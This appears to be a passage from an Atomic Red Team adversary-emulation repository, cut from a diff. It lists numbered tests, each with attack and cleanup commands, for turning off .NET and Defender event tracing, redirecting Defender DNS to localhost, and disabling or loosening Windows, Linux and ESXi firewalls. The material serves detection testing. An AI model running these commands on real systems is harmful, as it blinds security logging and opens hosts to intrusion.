expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
```
### Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
```
#### Cleanup Commands
```cmd
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
```
### Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
```
#### Cleanup Commands
```powershell
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
```
### Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```
### Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```
### Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b`
#### Attack Commands: Run with `command_prompt`!
```cmd
REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee`
#### Attack Commands: Run with `powershell`!
```powershell
New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
```
### Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
```
### Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
**Supported Platforms:** Windows
**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
```
#### Cleanup Commands
```powershell
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
```
atomics/T1686/T1686.md
-860
View File
@@ -1,860 +0,0 @@
# T1686 - Disable or Modify System Firewall
## Description from ATT&CK
> Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
>
> Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
>
> Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.
>
> In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)
[Source](https://attack.mitre.org/techniques/T1686)
## Atomic Tests
- [Atomic Test #1: Disable Microsoft Defender Firewall](#atomic-test-1-disable-microsoft-defender-firewall)
- [Atomic Test #2: Disable Microsoft Defender Firewall via Registry](#atomic-test-2-disable-microsoft-defender-firewall-via-registry)
- [Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-3-allow-smb-and-rdp-on-microsoft-defender-firewall)
- [Atomic Test #4: Opening ports for proxy - HARDRAIN](#atomic-test-4-opening-ports-for-proxy---hardrain)
- [Atomic Test #5: Open a local port through Windows Firewall to any profile](#atomic-test-5-open-a-local-port-through-windows-firewall-to-any-profile)
- [Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-6-allow-executable-through-firewall-located-in-non-standard-location)
- [Atomic Test #7: Stop/Start UFW firewall](#atomic-test-7-stopstart-ufw-firewall)
- [Atomic Test #8: Stop/Start Packet Filter](#atomic-test-8-stopstart-packet-filter)
- [Atomic Test #9: Stop/Start UFW firewall systemctl](#atomic-test-9-stopstart-ufw-firewall-systemctl)
- [Atomic Test #10: Turn off UFW logging](#atomic-test-10-turn-off-ufw-logging)
- [Atomic Test #11: Add and delete UFW firewall rules](#atomic-test-11-add-and-delete-ufw-firewall-rules)
- [Atomic Test #12: Add and delete Packet Filter rules](#atomic-test-12-add-and-delete-packet-filter-rules)
- [Atomic Test #13: Edit UFW firewall user.rules file](#atomic-test-13-edit-ufw-firewall-userrules-file)
- [Atomic Test #14: Edit UFW firewall ufw.conf file](#atomic-test-14-edit-ufw-firewall-ufwconf-file)
- [Atomic Test #15: Edit UFW firewall sysctl.conf file](#atomic-test-15-edit-ufw-firewall-sysctlconf-file)
- [Atomic Test #16: Edit UFW firewall main configuration file](#atomic-test-16-edit-ufw-firewall-main-configuration-file)
- [Atomic Test #17: Tail the UFW firewall log file](#atomic-test-17-tail-the-ufw-firewall-log-file)
- [Atomic Test #18: Disable iptables](#atomic-test-18-disable-iptables)
- [Atomic Test #19: Modify/delete iptables firewall rules](#atomic-test-19-modifydelete-iptables-firewall-rules)
- [Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd](#atomic-test-20-lockbit-black---unusual-windows-firewall-registry-modification--cmd)
- [Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell](#atomic-test-21-lockbit-black---unusual-windows-firewall-registry-modification--powershell)
- [Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22-blackbit---disable-windows-firewall-using-netsh-firewall)
- [Atomic Test #23: ESXi - Disable Firewall via Esxcli](#atomic-test-23-esxi---disable-firewall-via-esxcli)
- [Atomic Test #24: Set a firewall rule using New-NetFirewallRule](#atomic-test-24-set-a-firewall-rule-using-new-netfirewallrule)
- [Atomic Test #25: ESXi - Set Firewall to PASS Traffic](#atomic-test-25-esxi---set-firewall-to-pass-traffic)
### Atomic Test #1: Disable Microsoft Defender Firewall
Disables the Microsoft Defender Firewall for the current profile.
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
**Supported Platforms:** Windows
**auto_generated_guid:** `88d05800-a5e4-407e-9b53-ece4174f197f`
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh advfirewall set currentprofile state off
```
#### Cleanup Commands
```cmd
netsh advfirewall set currentprofile state on >nul 2>&1
```
### Atomic Test #2: Disable Microsoft Defender Firewall via Registry
Disables the Microsoft Defender Firewall for the public profile via registry
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
**Supported Platforms:** Windows
**auto_generated_guid:** `afedc8c4-038c-4d82-b3e5-623a95f8a612`
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f
```
### Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall
Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...
**Supported Platforms:** Windows
**auto_generated_guid:** `d9841bf8-f161-4c73-81e9-fd773a5ff8c1`
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
```
#### Cleanup Commands
```cmd
netsh advfirewall reset >nul 2>&1
```
### Atomic Test #4: Opening ports for proxy - HARDRAIN
This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.
reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
**Supported Platforms:** Windows
**auto_generated_guid:** `15e57006-79dd-46df-9bf9-31bc24fb5a80`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450
```
#### Cleanup Commands
```cmd
netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 >nul 2>&1
```
### Atomic Test #5: Open a local port through Windows Firewall to any profile
This test will attempt to open a local port defined by input arguments to any profile
**Supported Platforms:** Windows
**auto_generated_guid:** `9636dd6e-7599-40d2-8eee-ac16434f35ed`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_port | This is the local port you wish to test opening | integer | 3389|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any
```
#### Cleanup Commands
```powershell
netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
```
### Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location
This test will attempt to allow an executable through the system firewall located in the Users directory
**Supported Platforms:** Windows
**auto_generated_guid:** `6f5822d2-d38d-4f48-9bfc-916607ff6b8c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1686&#92;bin&#92;AtomicTest.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Copy-Item "#{exe_file_path}" -Destination "C:\Users\$env:UserName" -Force
netsh advfirewall firewall add rule name="Atomic Test" dir=in action=allow program="C:\Users\$env:UserName\AtomicTest.exe" enable=yes
```
#### Cleanup Commands
```powershell
netsh advfirewall firewall delete rule name="Atomic Test" | Out-Null
Remove-Item C:\Users\$env:UserName\AtomicTest.exe -ErrorAction Ignore
```
### Atomic Test #7: Stop/Start UFW firewall
Stop the Uncomplicated Firewall (UFW) if installed.
**Supported Platforms:** Linux
**auto_generated_guid:** `fe135572-edcd-49a2-afe6-1d39521c5a9a`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
ufw disable
```
#### Cleanup Commands
```sh
ufw enable
ufw status verbose
```
#### Dependencies: Run with `sh`!
##### Description: Check if ufw is installed on the machine.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #8: Stop/Start Packet Filter
Stop the Packet Filter if installed.
**Supported Platforms:** Linux
**auto_generated_guid:** `0ca82ed1-0a94-4774-9a9a-a2c83a8022b7`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
service pf stop
service pf disable
```
#### Cleanup Commands
```sh
service pf enable
service pf start
service pf status
```
#### Dependencies: Run with `sh`!
##### Description: Check if pfctl is installed on the machine.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi
if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #9: Stop/Start UFW firewall systemctl
Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
**Supported Platforms:** Linux
**auto_generated_guid:** `9fd99609-1854-4f3c-b47b-97d9a5972bd1`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
systemctl stop ufw
```
#### Cleanup Commands
```sh
systemctl start ufw
systemctl status ufw
```
#### Dependencies: Run with `sh`!
##### Description: Check if systemctl and ufw is installed on the machine.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #10: Turn off UFW logging
Turn off the Uncomplicated Firewall (UFW) logging.
**Supported Platforms:** Linux
**auto_generated_guid:** `8a95b832-2c2a-494d-9cb0-dc9dd97c8bad`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
ufw logging off
```
#### Cleanup Commands
```sh
ufw logging low
ufw status verbose
```
#### Dependencies: Run with `sh`!
##### Description: Check if ufw is installed on the machine and enabled.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #11: Add and delete UFW firewall rules
Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled.
**Supported Platforms:** Linux
**auto_generated_guid:** `b2563a4e-c4b8-429c-8d47-d5bcb227ba7a`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
ufw prepend deny from 1.2.3.4
ufw status numbered
```
#### Cleanup Commands
```sh
{ echo y; echo response; } | ufw delete 1
ufw status numbered
```
#### Dependencies: Run with `sh`!
##### Description: Check if ufw is installed on the machine and enabled.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #12: Add and delete Packet Filter rules
Add and delete a rule on the Packet Filter (PF) if installed and enabled.
**Supported Platforms:** Linux
**auto_generated_guid:** `8b23cae1-66c1-41c5-b79d-e095b6098b5b`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
pfctl -a pf-rules -s rules
```
#### Cleanup Commands
```sh
pfctl -a pf-rules -F rules
sed -i "" '/anchor pf-rules/d'
pfctl -f /etc/pf.conf
```
#### Dependencies: Run with `sh`!
##### Description: Check if pf is installed on the machine and enabled.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi
if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo "anchor pf-rules >> /etc/pf.conf"
pfctl -f /etc/pf.conf
```
### Atomic Test #13: Edit UFW firewall user.rules file
Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
**Supported Platforms:** Linux
**auto_generated_guid:** `beaf815a-c883-4194-97e9-fdbbb2bbdd7c`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo "# THIS IS A COMMENT" >> /etc/ufw/user.rules
grep "# THIS IS A COMMENT" /etc/ufw/user.rules
```
#### Cleanup Commands
```sh
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules
```
#### Dependencies: Run with `sh`!
##### Description: Check if /etc/ufw/user.rules exists.
###### Check Prereq Commands
```sh
if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #14: Edit UFW firewall ufw.conf file
Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
which controls if the firewall starts on boot and its logging level.
**Supported Platforms:** Linux
**auto_generated_guid:** `c1d8c4eb-88da-4927-ae97-c7c25893803b`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo "# THIS IS A COMMENT" >> /etc/ufw/ufw.conf
grep "# THIS IS A COMMENT" /etc/ufw/ufw.conf
```
#### Cleanup Commands
```sh
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf
cat /etc/ufw/ufw.conf
```
#### Dependencies: Run with `sh`!
##### Description: Check if /etc/ufw/ufw.conf exists.
###### Check Prereq Commands
```sh
if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #15: Edit UFW firewall sysctl.conf file
Edit the Uncomplicated Firewall (UFW) configuration file for setting network
variables /etc/ufw/sysctl.conf.
**Supported Platforms:** Linux
**auto_generated_guid:** `c4ae0701-88d3-4cd8-8bce-4801ed9f97e4`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo "# THIS IS A COMMENT" >> /etc/ufw/sysctl.conf
grep "# THIS IS A COMMENT" /etc/ufw/sysctl.conf
```
#### Cleanup Commands
```sh
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf
cat /etc/ufw/sysctl.conf
```
#### Dependencies: Run with `sh`!
##### Description: Check if /etc/ufw/sysctl.conf exists.
###### Check Prereq Commands
```sh
if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #16: Edit UFW firewall main configuration file
Edit the Uncomplicated Firewall (UFW) main configuration file for setting
default policies /etc/default/ufw.
**Supported Platforms:** Linux
**auto_generated_guid:** `7b697ece-8270-46b5-bbc7-6b9e27081831`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo "# THIS IS A COMMENT" >> /etc/default/ufw
grep "# THIS IS A COMMENT" /etc/default/ufw
```
#### Cleanup Commands
```sh
sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw
```
#### Dependencies: Run with `sh`!
##### Description: Check if /etc/default/ufw exists.
###### Check Prereq Commands
```sh
if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #17: Tail the UFW firewall log file
Print the last 10 lines of the Uncomplicated Firewall (UFW) log file
/var/log/ufw.log.
**Supported Platforms:** Linux
**auto_generated_guid:** `419cca0c-fa52-4572-b0d7-bc7c6f388a27`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
tail /var/log/ufw.log
```
#### Cleanup Commands
```sh
```
#### Dependencies: Run with `sh`!
##### Description: Check if /var/log/ufw.log exists.
###### Check Prereq Commands
```sh
if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
echo ""
```
### Atomic Test #18: Disable iptables
Some Linux systems may not activate ufw, but use iptables for firewall rules instead. (ufw works on top of iptables.)
Attackers cannot directly disable iptables, as it is not implemented as a service like ufw. But they can flush all iptables
rules, which in fact "disable" iptables.
**Supported Platforms:** Linux
**auto_generated_guid:** `7784c64e-ed0b-4b65-bf63-c86db229fd56`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
iptables-save > /tmp/iptables.rules
iptables -F
```
#### Cleanup Commands
```sh
iptables-restore < /tmp/iptables.rules
```
#### Dependencies: Run with `sh`!
##### Description: Check if iptables is installed on the machine.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
sudo apt-get install iptables
```
### Atomic Test #19: Modify/delete iptables firewall rules
Instead of completely "disabling" iptables, adversaries may choose to delete a certain rule, which, for example, blocks data exfiltration via ftp.
By doing so, they may cause less noise to avoid detection.
**Supported Platforms:** Linux
**auto_generated_guid:** `899a7fb5-d197-4951-8614-f19ac4a73ad4`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
iptables -D OUTPUT -p tcp --dport 21 -j DROP
```
#### Cleanup Commands
```sh
iptables-restore < /tmp/iptables.rules
```
#### Dependencies: Run with `sh`!
##### Description: Check if iptables is installed on the machine.
###### Check Prereq Commands
```sh
if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi
if ! echo "$(iptables -L)" | grep -q "DROP .*dpt:ftp"; then echo -e "\n***** this firewall rule is NOT activated *****\n***** activate it by executing \"iptables -A OUTPUT -p tcp --dport 21 -j DROP\" *****\n"; exit 1; fi
```
###### Get Prereq Commands
```sh
iptables-save > /tmp/iptables.rules
if echo "$(iptables -L)" | grep -q "DROP .*dpt:ftp"; then echo "Rule found"; else echo "Rule not found. Setting it..."; iptables -A OUTPUT -p tcp --dport 21 -j DROP; fi
```
### Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd
An adversary tries to modify the windows firewall registry
**Supported Platforms:** Windows
**auto_generated_guid:** `a4651931-ebbb-4cde-9363-ddf3d66214cb`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /f >nul 2>&1
```
### Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell
An adversary tries to modify the windows firewall registry.
**Supported Platforms:** Windows
**auto_generated_guid:** `80b453d1-eec5-4144-bf08-613a6c3ffe12`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore
```
### Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall
An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works).
**Supported Platforms:** Windows
**auto_generated_guid:** `91f348e6-3760-4997-a93b-2ceee7f254ee`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
netsh firewall set opmode mode=disable
```
#### Cleanup Commands
```cmd
netsh firewall set opmode mode=enable >nul 2>&1
```
### Atomic Test #23: ESXi - Disable Firewall via Esxcli
Adversaries may disable the ESXI firewall via ESXCLI
**Supported Platforms:** Windows
**auto_generated_guid:** `bac8a340-be64-4491-a0cc-0985cb227f5a`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
| username | username used to log into ESXi | string | root|
| password | password used to log into ESXI | string | n/a|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt
```
#### Cleanup Commands
```cmd
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt
```
#### Dependencies: Run with `powershell`!
##### Description: The plink executable must be found in the ExternalPayloads folder.
###### Check Prereq Commands
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
### Atomic Test #24: Set a firewall rule using New-NetFirewallRule
This test will attempt to create a new inbound/outbound firewall rule using the New-NetFirewallRule commandlet.
**Supported Platforms:** Windows
**auto_generated_guid:** `94be7646-25f6-467e-af23-585fb13000c8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| direction | Direction can be Inbound or Outbound | string | Inbound|
